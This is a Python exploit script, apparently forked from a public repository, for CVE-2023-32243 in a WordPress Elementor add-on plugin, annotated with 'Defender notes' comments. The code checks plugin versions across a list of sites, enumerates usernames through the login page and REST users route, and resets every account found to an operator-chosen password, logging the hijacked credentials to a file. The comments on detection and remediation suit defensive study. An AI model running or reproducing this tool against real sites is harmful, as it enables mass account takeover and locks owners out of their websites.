forked from RandomRobbieBF/CVE-2023-32243
exploit.py
import re
import sys
import requests
import argparse
from colorama import Fore, Style
from bs4 import BeautifulSoup
import urllib3
# Silences urllib3's InsecureRequestWarning, which would otherwise be emitted
# for every request in this file made with verify=False (certificate checks off).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from concurrent.futures import ThreadPoolExecutor
# Fingerprint step: returns True when `target` serves a readme.txt for the
# essential-addons-for-elementor-lite plugin whose "Stable tag" falls inside the
# range this script treats as affected by CVE-2023-32243, False otherwise.
#
# NOTE(review): this listing lost its indentation on extraction; the lines are
# kept exactly as shown and the nesting is not reconstructed here.
#
# Defender notes:
# - The only signal used is an unauthenticated GET of the plugin's readme.txt.
#   That request in access logs, followed by POSTs to /wp-admin/admin-ajax.php
#   from the same client, is the sequence this file produces.
# - The script itself treats tags from 5.7.2 upward as not affected (`< 572`),
#   so updating the plugin to that release or later is the matching remediation.
# - A False result or an aborted run is not evidence that a site is patched:
#   a hidden or missing readme.txt ends the run, and tags that are not three
#   dotted numbers are not handled (see the comparison). Confirm the installed
#   version on the host instead.
def check_version(target):
try:
# Certificate verification is disabled for this request (verify=False).
r = requests.get(f"{target}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt", verify=False)
# Captures the rest of the line after "Stable tag: "; if the pattern is
# absent re.search returns None and the attribute access raises.
version = re.search(r"Stable tag: (.*)", r.text).groups()[0]
except:
# Bare except: any failure above (network error, no match, ...) prints a
# generic message and terminates the process via exit().
print(Fore.RED + 'Error...')
exit()
# Dots are removed and the remaining digits compared as a single integer, so the
# accepted window is 540..571 inclusive (e.g. 5.4.0 through 5.7.1). A tag with a
# different number of components concatenates to another magnitude, and a tag
# with non-digit characters makes int() raise outside the try above.
if int(version.replace('.', '')) < 572 and int(version.replace('.', '')) > 539:
return True
else:
return False
# Appends one "target|username|password" line to success.txt in the current
# working directory.
#
# Defender notes:
# - The file holds site URLs, account names and the newly set password in clear
#   text. If recovered during an investigation, each line names an account to
#   treat as compromised.
# - The file is opened in append mode ("a"), so entries from earlier runs are
#   kept rather than overwritten.
def save_result(target, username, password):
result = f"{target}|{username}|{password}\n"
with open("success.txt", "a") as file:
file.write(result)
# Sends the two requests this script uses for CVE-2023-32243 against one
# (target, username) pair and reports whether the response contains the
# plugin's success message. Returns None in every path; on a reported success
# it also records the result through save_result().
#
# NOTE(review): this listing lost its indentation on extraction; the lines are
# kept exactly as shown and the nesting is not reconstructed here.
#
# Defender notes:
# - Detection: both requests are POSTs to /wp-admin/admin-ajax.php on one
#   session. The first carries action=eael_get_token; the second carries the
#   eael-resetpassword-* fields and rp_login. These are form-body fields, so
#   plain access logs show only the two POSTs; matching on the field names
#   needs request-body logging or a WAF rule.
# - Response-side indicator: the script treats the text
#   "Your password has been reset" in the second response as success.
# - Mitigation: update the plugin (the version check in this file treats 5.7.2
#   and later as not affected). On sites that ran an affected release, review
#   accounts for password changes nobody requested, reset those credentials and
#   invalidate existing sessions.
def exploit(target, username, password):
s = requests.Session()
data = {
'action': 'eael_get_token'
}
try:
# First request: asks the plugin's AJAX action for a nonce, sent without
# any login step in this file. Certificate verification is off.
r = s.post(f'{target}/wp-admin/admin-ajax.php', data=data, verify=False)
except:
# Bare except: any request failure silently ends this attempt.
return
try:
# Pulls the nonce value out of the JSON-looking response text with a greedy
# regex rather than parsing the body as JSON.
nonce = re.search(r"\"nonce\":\"(.*)\"}", r.text).groups()[0]
except:
# No nonce in the response (pattern absent): give up without output.
return
# Form fields of the password-reset submission. widget_id and page_id are
# hard-coded to 1; the same password is sent in both password fields.
payload = {
'eael-resetpassword-submit': 'Reset',
'widget_id': 1,
'page_id': 1,
'eael-resetpassword-nonce': nonce,
'eael-pass1': password,
'eael-pass2': password,
'rp_login': username
}
try:
# Second request, same session and endpoint as the first.
r = s.post(f'{target}/wp-admin/admin-ajax.php', data=payload, verify=False)
except:
return
# Success is inferred only from the presence of this message in the response
# body; the HTTP status code is not inspected.
if re.search(r"Your password has been reset", r.text) is not None:
save_result(target, username, password)
print(Fore.GREEN + f"Successful: {target} ({username} - {password})")
else:
print(Fore.RED + f"Unsuccessful: {target} ({username} - {password})")
# Fetches `url` (the caller in this file passes the site's wp-login.php) and
# returns the `value` attribute of every <input name="log"> found in the HTML.
#
# Defender notes:
# - This only yields a name when the login form is served with the username
#   field already filled in; an empty form contributes nothing useful.
# - An input without a value attribute presumably contributes None to the list
#   (Tag.get with no default) -- confirm against the bs4 version in use.
# - The request is made with certificate verification disabled and, unlike the
#   other helpers, without any exception handling.
def find_usernames_html(url):
response = requests.get(url, verify=False)
soup = BeautifulSoup(response.text, 'html.parser')
users = []
for input_tag in soup.find_all('input', {'name': 'log'}):
users.append(input_tag.get('value'))
return users
# Queries the WordPress REST users route on `url` and returns the `slug` of
# each entry in the JSON response; returns an empty list on a non-200 status or
# when the body is not valid JSON.
#
# NOTE(review): this listing lost its indentation on extraction; the lines are
# kept exactly as shown and the nesting is not reconstructed here.
#
# Defender notes:
# - This is unauthenticated username enumeration through
#   /wp-json/wp/v2/users. Requiring authentication for that route, or blocking
#   it at the edge, removes this source of account names.
# - Anonymous GETs of that route are a useful reconnaissance signal in logs.
def find_usernames_wp_json(url):
# Certificate verification is disabled for this request (verify=False).
response = requests.get(f"{url}/wp-json/wp/v2/users", verify=False)
if response.status_code == 200:
users = []
try:
json_response = response.json()
except:
# Body was not JSON (bare except): treat as "no users found".
return users
for user in json_response:
# Only entries that expose a 'slug' key are used.
if 'slug' in user:
users.append(user['slug'])
return users
else:
return []
# Combines the two enumeration helpers for one site: names read from the
# wp-login.php form first, then slugs from the REST users route.
# The two lists are concatenated as-is, so a name found by both appears twice.
def find_usernames(target):
usernames_html = find_usernames_html(f"{target}/wp-login.php")
usernames_wp_json = find_usernames_wp_json(target)
usernames = usernames_html + usernames_wp_json
return usernames
# Script entry point: prints a banner, parses the command line, reads a list of
# sites from a file and runs the check / enumerate / reset sequence per site.
#
# NOTE(review): this listing lost its indentation on extraction; the lines are
# kept exactly as shown. In particular it cannot be told from here whether the
# final Style.RESET_ALL print sits inside the per-site loop or after it.
#
# Defender notes:
# - The tool works from a list of sites and sets the same --password on every
#   account it reaches, so one password value reused across many unrelated
#   sites is a correlating indicator for this run.
# - Traffic order per site, as written: one GET of the plugin readme.txt, one
#   GET of wp-login.php, one GET of /wp-json/wp/v2/users, then two
#   admin-ajax.php POSTs per discovered username.
if __name__ == "__main__":
# Banner only; these strings have no effect on the requests sent.
print(Fore.BLUE + "\t\t\t\t|*|*|*|*|*| WordPress Exploit |*|*|*|*|*|")
print(Fore.BLUE + "\t\t\t\t")
print(Fore.RED + "\t\t\t\t M@rAz Ali & MR.Persia")
print(Fore.RED + "\t\t\t\t")
print(Fore.RED + "\t\t\t\t|*|*|*|*| https://t.me/public_html |*|*|*|*|")
print(Style.RESET_ALL)
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-32243.')
parser.add_argument('-l', '--list', required=True, help='Path to the file containing the list of websites')
parser.add_argument('-t', '--threads', type=int, default=1, help='Number of threads (default: 1)')
parser.add_argument('-p', '--password', required=True, help="New password for the account")
args = parser.parse_args()
# One site per line; lines are used verbatim as the URL prefix of every request.
with open(args.list, "r") as file:
websites = file.read().splitlines()
with ThreadPoolExecutor(max_workers=args.threads) as executor:
for target in websites:
print(Fore.BLUE + f"Target: {target}")
# The version check and username enumeration are called directly here, not
# through the executor; only the exploit() calls are submitted to the pool.
if check_version(target):
print(Fore.YELLOW + "Vulnerable version found. Starting exploitation...")
usernames = find_usernames(target)
for username in usernames:
# The returned Future is discarded, so an exception raised inside
# exploit() is never surfaced to the operator.
executor.submit(exploit, target, username, args.password)
else:
print(Fore.YELLOW + "Not vulnerable.")
print(Style.RESET_ALL)
# Printed unconditionally, whether or not any attempt succeeded.
print(Fore.GREEN + "Exploitation completed. Results are saved in success.txt.")